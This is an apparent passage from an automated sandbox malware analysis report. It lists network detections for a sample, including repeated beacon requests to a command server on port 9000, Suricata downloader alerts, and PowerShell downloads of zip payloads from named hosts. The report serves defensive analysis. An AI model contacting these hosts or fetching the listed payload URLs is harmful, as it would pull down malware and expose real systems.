Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49776
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49801
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49726 -> 92.255.85.36:15847
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000
Source: global traffic HTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 92.255.85.36:9000Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 164.132.58.105 164.132.58.105
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 92.255.85.36 92.255.85.36
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SOVTEL-ASRU SOVTEL-ASRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49751 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49755 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49756 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49760 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49758 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49764 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49767 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49775 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49769 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49784 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49777 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49782 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49781 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49785 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49786 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49789 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49788 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49791 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49792 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49795 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49796 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49798 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49799 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49800 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49794 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49724 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49724 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49715 -> 164.132.58.105:443
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49717 -> 164.132.58.105:443
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49717 -> 164.132.58.105:443
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49718 -> 188.114.97.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /0xf6EA7bF5d089F439Ec6e7a131388579d0Caa862d4EE0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: rentry.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /0xf6EA7bF5d089F439Ec6e7010101a88579d0Caa862d4EE0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: rentry.org
Source: global traffic HTTP traffic detected: GET /archive.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: main-connection.clickConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Download_StarW3_pack.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: main-connection.click
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 92.255.85.36
